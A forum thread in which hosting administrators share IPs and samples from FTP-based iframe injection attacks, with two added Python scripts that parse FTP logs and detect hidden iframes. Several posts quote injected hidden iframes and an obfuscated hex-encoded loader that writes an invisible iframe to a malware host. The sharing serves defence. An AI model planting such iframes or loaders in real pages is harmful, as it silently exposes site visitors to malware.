IP addresses from IFrame Hacks

Puggs

Member
Oct 1, 2007
Hi

66.36.241.185 8:30pm Australian Eastern Standard Time +10:00 1st Oct
66.36.241.185 4:20am Australian Eastern Standard Time +10:00 2nd Oct

d_t

Well-Known Member
Sep 20, 2003
Bucharest
81.95.149.75 - October, 2 2007
(client confirmed he used FTP from an infected PC the day before)

wkdwich

Well-Known Member
Apr 11, 2005
Since June, the ones I have caught:


12.130.132.229
132.239.235.55
195.133.109.227
202.151.177.83
203.121.67.164
203.223.159.210
210.188.204.80
211.118.175.22
211.63.65.46
217.118.82.41
217.170.77.210
217.195.87.197
221.201.100.253
24.82.147.206
58.65.235.105
61.183.247.7
69.11.37.86
69.41.162.77
69.50.180.186
71.242.248.228
72.37.179.44
80.81.208.67
81.177.4.34
82.75.59.65
84.164.206.37

rvskin

Well-Known Member
PartnerNOC
Feb 19, 2003
Here is my collection.

66.246.218.145 # Sep 09 2007
84.16.252.163 # Aug 29 2007
194.83.36.2 # Aug 30 2007
69.41.162.77 # Sep 27 2007
213.27.26.11 # Sep 27 2007
116.0.103.111 # Oct 9 2007
202.164.52.199 # Oct 9 2007

Imai

Well-Known Member
Aug 11, 2003
81.95.150.178 on October 8

<IFRAME name='StatPage' src='http://www.911traff.com/trf/traf.php' width=5 height=5 style='display:none'></IFRAME>

Looks like a one-off case, as I am still checking the other accounts and logs.

Infopro

Well-Known Member
May 20, 2003
Pennsylvania
cPanel Access Level
Root Administrator
Thanks for the information.

Keep it coming. :)

I don't want to sound pessimistic here, or take this thread too far off topic, but is posting these IPs really going to be helpful? Anyone who watches their logs can tell you the hits just keep on coming: block one, another pops up. Block 130 (my max for CSF entries to the blocked list), and another 130 more get blocked next month.

Soon as they are found out at hopone or ipowerweb or rbnnetwork or netdirekt.de or hostfresh.com or any one of a zillion other places, they're already setup on someone else's server continuing to do what they do.

Trying to track down how its happening is a good thing, keeping track of IPs may be good as well, but this'll go on forever. (the thread)

Wouldn't it be more advantageous to all concerned if we as system administrators were sharing our security tips instead? A nice long thread with the top security tips would surely be more helpful, IMHO of course.

For one example, many have Fantastico installed, but did you know that just because Fantastico tells you all files are up to date, and all installations are listed as up to date, that doesn't mean squat? Users will install components to Joomla that are very buggy and can be cracked:
http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/

That's just one example, there are thousands of examples we could be sharing that I think might really be more helpful than this list of IPs.


We're all in this boat together here as cPanel admins, and while sharing tips might be actually helping your competition in this hosting business, at the same time those who have no clues about security are a huge part of the reason others of us are having problems.

Some kid (no offense, kids) gets his own cPanel server, gives all his buddies free accounts, and they get broken into because that kid didn't secure his server properly and his buddies are so excited to have a free account that they install everything under the sun without knowing the consequences. And the end result is what we're all discussing here.

cPanel is great stuff, but installing it and using the built in security is not enough. Not by a long shot. I watch my logs via WHM daily, using logview, I get system logs by mail every hour, and I can tell you the hits just keep on coming, every hour every day every month.

You can block IPs until the cows come home, that's not going to keep you secure.

Anyway, sorry for the rant, just my 2.

rpmws

Well-Known Member
Aug 14, 2001
back woods of NC, USA
Infopro said: (quoted in full above)
You are correct!! I agree with you almost 100% with everything you said in general, except one thing. These FTP login defacements, or whatever you want to call them, come from legit logins that have been snatched from locally exploited machines (I think) (or a compromised billing system that stores logins). At least that is what I have always thought. If that is the case, then the only way to keep them out is to either block or disable FTP, or block the known IP(s) they came in from.
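If the sessions really are authenticated logins with stolen passwords, the FTP transfer log is where they show up: an upload of an index file into an account, from a host that then does the same to other accounts. The script below is an added example and not code from any poster in this thread. It assumes the xferlog layout written by wu-ftpd, ProFTPD and Pure-FTPd; the log lines are constructed samples (the account names and paths are made up, and the thread's own IPs are reused only as sample data). It lists which remote host rewrote which account's index file, and which hosts touched more than one account, so those can go straight into a CSF deny entry.

```python
"""Pull FTP uploads of web index files out of an xferlog and group them by
remote IP and account, so the IPs behind an iframe-injection run can be
blocked and the affected accounts listed.

Added example, not code from any poster in this thread. The log lines are
constructed samples in the xferlog layout written by wu-ftpd, ProFTPD and
Pure-FTPd; the accounts and paths are made up, and the IPs are reused from
the thread only as sample data.
"""
import re
from collections import defaultdict

# Files an iframe-injecting FTP session typically overwrites.
INDEX_FILES = {"index.html", "index.htm", "index.php", "default.html", "default.htm"}

# xferlog fields: current-time (5 tokens) transfer-time remote-host file-size
# filename transfer-type special-action direction access-mode username
# service-name authentication-method authenticated-user-id completion-status
XFERLOG_RE = re.compile(
    r"^(?P<date>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4}) "
    r"(?P<secs>\d+) (?P<host>\S+) (?P<size>\d+) (?P<path>\S+) "
    r"(?P<type>[ab]) (?P<action>\S) (?P<dir>[io]) (?P<mode>[arg]) "
    r"(?P<user>\S+) (?P<service>\S+) (?P<auth>\d) (?P<uid>\S+) "
    r"(?P<status>[ci])$"
)

# Constructed sample log: two accounts rewritten from one remote host, one
# account from another, a normal download, a normal upload, an incomplete
# transfer, and a junk line that must be skipped.
SAMPLE_LOG = """\
Mon Oct  1 20:30:12 2007 1 66.36.241.185 1842 /home/shop/public_html/index.html a _ i r shop ftp 0 * c
Mon Oct  1 20:30:13 2007 1 66.36.241.185 210 /home/shop/public_html/logo.gif b _ o r shop ftp 0 * c
Tue Oct  2 04:20:01 2007 1 66.36.241.185 1902 /home/blog/public_html/index.php a _ i r blog ftp 0 * c
Tue Oct  2 09:15:44 2007 2 203.0.113.7 5120 /home/blog/public_html/posts/new.html a _ i r blog ftp 0 * c
Tue Oct  2 11:02:09 2007 1 81.95.149.75 1790 /home/acme/public_html/index.html a _ i r acme ftp 0 * c
Tue Oct  2 11:02:10 2007 0 81.95.149.75 1790 /home/acme/public_html/index.html a _ i r acme ftp 0 * i
this line is not xferlog format and is skipped
"""


def parse_xferlog(text):
    """Yield one dict per well-formed xferlog line; anything else is skipped."""
    for line in text.splitlines():
        m = XFERLOG_RE.match(line)
        if m:
            yield m.groupdict()


def index_uploads(text):
    """Return {user: {ip: [(date, path), ...]}} for completed incoming
    transfers whose basename is a web index file."""
    hits = defaultdict(lambda: defaultdict(list))
    for rec in parse_xferlog(text):
        if rec["dir"] != "i" or rec["status"] != "c":
            continue  # only finished uploads matter
        if rec["path"].rsplit("/", 1)[-1].lower() not in INDEX_FILES:
            continue
        hits[rec["user"]][rec["host"]].append((rec["date"], rec["path"]))
    return {user: dict(ips) for user, ips in hits.items()}


def ips_touching_multiple_accounts(text):
    """IPs that uploaded index files into more than one account: one remote
    host rewriting many users' index pages is the pattern reported here."""
    by_ip = defaultdict(set)
    for user, ips in index_uploads(text).items():
        for ip in ips:
            by_ip[ip].add(user)
    return sorted(ip for ip, users in by_ip.items() if len(users) > 1)


if __name__ == "__main__":
    for user, ips in index_uploads(SAMPLE_LOG).items():
        for ip, files in ips.items():
            for date, path in files:
                print(f"{user:8} {ip:16} {date}  {path}")
    print("seen across accounts:", ips_touching_multiple_accounts(SAMPLE_LOG))
```

Run it against /var/log/xferlog (or wherever your FTP daemon writes it) instead of SAMPLE_LOG; an IP that appears under several accounts within minutes is the one to deny, and the listed accounts are the ones whose index files and passwords need attention.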

Todd Mitchell

Well-Known Member
Staff member
Nov 13, 2006
Houston, TX
Feel free to start a new post where admins can post security tips, helpful notes etc.

We are asking for attacking IPs in this thread for information gathering purposes. We aren't creating a list of IPs to delete or anything like that. We just need a few IPs that are known to attack several different servers to help us gain an understanding about what's occurring during the attacks and how they are being propagated. :)

mooony

Well-Known Member
Nov 9, 2002
I have this morning 4 servers infected with iframes. These accounts were accessed by FTP.

ip: 58.65.239.10

PHP:
<iframe src='http://ltraffic.biz/resource.php?id=4531&user=Nikson' width='1' height='1' style='visibility: hidden;'></iframe>
I hope this helps.

Ronald

sehh

Well-Known Member
Feb 11, 2006
Europe
We've seen lots of FTP attacks from: 72.95.215.3

mtindor

Well-Known Member
Sep 14, 2004
inside a catfish
cPanel Access Level
Root Administrator
mooony said: (quoted in full above)
What percentage of accounts on each server? or are you saying EVERY account on four servers had this happen?

Mike

d_t

Well-Known Member
Sep 20, 2003
Bucharest
FTP connection with user password from: 77.221.133.186

Code added to index.html:
Code:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>
<script>
// parseInt(chunk, 16): turns one two-character hex chunk into a character code
function v4757fc58cd991(v4757fc58ce18a){ function v4757fc58ce999 () {return 16;} return(parseInt(v4757fc58ce18a,v4757fc58ce999()));}
// walks the hex string two characters at a time and rebuilds the hidden markup
function v4757fc58cf989(v4757fc58d0183){ var v4757fc58d1171=2; var v4757fc58d097a='';for(v4757fc58d0d7d=0; v4757fc58d0d7d<v4757fc58d0183.length; v4757fc58d0d7d+=v4757fc58d1171){ v4757fc58d097a+=(String.fromCharCode(v4757fc58cd991(v4757fc58d0183.substr(v4757fc58d0d7d, v4757fc58d1171))));}return v4757fc58d097a;}
// the hex decodes to a second <script> that document.write()s a display:none iframe pointing at 77.221.133.188/.if/go.html
document.write(v4757fc58cf989('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633737386536356239373065207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313936353936292B273031665C272077696474683D353136206865696768743D333831207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
</script>
The code contains links to:
Code:
http://77.221.133.188/.if/go.html?19427401f
http://77.221.133.188/.dif/go.php?sid=1
http://77.221.133.189/.sp/in.cgi?p=t
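The hex blob in that script is the only part that matters, and it is trivial to undo: the posted decoder takes two hex characters at a time, runs parseInt(chunk, 16) on each, and joins the String.fromCharCode results. The script below is an added example, not code from any poster in this thread. It reproduces that decode, peels off loaders of the document.write(fn('HEX')) shape until none remain, and then reports every iframe in any layer that is either styled invisible or at most 5x5 pixels, which covers every injection shown in this thread. HEX_PAYLOAD is the hex string from the post above; SAMPLE_PAGE is a constructed page wrapping the posted snippet plus one ordinary visible iframe (a made-up example.com URL) for contrast.

```python
"""Find hidden iframes in a web page, including the one buried inside the
hex-encoded document.write() loader posted above, and list where they point.

Added example, not code from any poster in this thread. The decode mirrors
what the posted JavaScript does (parseInt(chunk, 16) on each two-character
chunk, then String.fromCharCode); HEX_PAYLOAD is the hex string from the post
above, and SAMPLE_PAGE is a constructed page that wraps the posted snippet plus
one ordinary, visible iframe (a made-up example.com URL) for contrast.
"""
import re

# Hex string exactly as posted above, split only for readability.
HEX_PAYLOAD = (
    "3C5343524950543E"
    "77696E646F772E7374617475733D27446F6E65273B"
    "646F63756D656E742E777269746528"
    "273C696672616D65206E616D653D633737386536356239373065"
    "207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F"
    "272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313936353936292B27"
    "3031665C27"
    "2077696474683D353136206865696768743D333831"
    "207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E"
    "27293C2F5343524950543E"
)

# Constructed page: the posted snippet plus one visible, benign iframe.
SAMPLE_PAGE = (
    "<html><body><h1>Welcome</h1>\n"
    "<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>"
    "<script>document.write(v4757fc58cf989('" + HEX_PAYLOAD + "'));</script>\n"
    "<iframe src='http://www.example.com/widget' width='300' height='200'></iframe>\n"
    "</body></html>"
)

# Stage-1 loader as seen in the post: document.write(<fn>('<hex>'))
LOADER_RE = re.compile(r"document\.write\(\w+\('([0-9A-Fa-f]+)'\)\)")
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# Attribute values may be quoted with ' or ", or with an escaped \' inside a JS string.
SRC_RE = re.compile(r"""\bsrc\s*=\s*\\?['"]?([^'"\s\\>]+)""", re.IGNORECASE)
DIM_RE = {d: re.compile(r"\b" + d + r"""\s*=\s*\\?['"]?(\d+)""", re.IGNORECASE)
          for d in ("width", "height")}
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
TINY = 5        # the posts above show 1x1 and 5x5 frames
MAX_LAYERS = 5  # guard against a loader that keeps decoding to another loader


def decode_hex_pairs(hexstr):
    """Two hex characters -> one character, as the posted decoder function does."""
    return bytes.fromhex(hexstr).decode("latin-1")


def unwrap_layers(html):
    """Return [page, decoded stage 2, ...], decoding loaders until none remain."""
    layers = [html]
    while len(layers) < MAX_LAYERS:
        m = LOADER_RE.search(layers[-1])
        if not m:
            break
        layers.append(decode_hex_pairs(m.group(1)))
    return layers


def hidden_iframes(html):
    """List (src, reason) for every iframe, in any layer, that is styled
    invisible or is at most TINY x TINY pixels."""
    found = []
    for layer in unwrap_layers(html):
        for m in IFRAME_RE.finditer(layer):
            attrs = m.group(1)
            reasons = []
            if HIDDEN_STYLE_RE.search(attrs):
                reasons.append("hidden by style")
            dims = [int(rx.search(attrs).group(1)) for rx in DIM_RE.values() if rx.search(attrs)]
            if dims and max(dims) <= TINY:
                reasons.append("tiny frame")
            if reasons:
                src = SRC_RE.search(attrs)
                found.append((src.group(1) if src else "(no src)", ", ".join(reasons)))
    return found


if __name__ == "__main__":
    layers = unwrap_layers(SAMPLE_PAGE)
    print("decoded stage 2:", layers[1] if len(layers) > 1 else "(none)")
    for src, why in hidden_iframes(SAMPLE_PAGE):
        print(f"{why:28} {src}")
```

Point hidden_iframes() at the contents of each account's index file instead of SAMPLE_PAGE to sweep a whole server; the src values it returns are the hosts to pull from the logs, and the decoded stage-2 text shows exactly what the obfuscated script would have written into the page.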